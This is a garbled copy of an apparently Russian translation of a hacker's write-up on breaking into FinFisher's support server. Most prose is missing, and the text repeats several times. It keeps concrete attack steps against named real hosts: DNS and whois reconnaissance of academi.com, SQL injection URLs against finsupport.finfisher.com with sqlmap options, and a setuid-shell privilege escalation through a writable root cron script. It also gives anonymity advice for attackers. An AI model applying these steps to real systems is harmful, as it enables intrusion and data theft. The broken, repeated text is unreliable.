whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
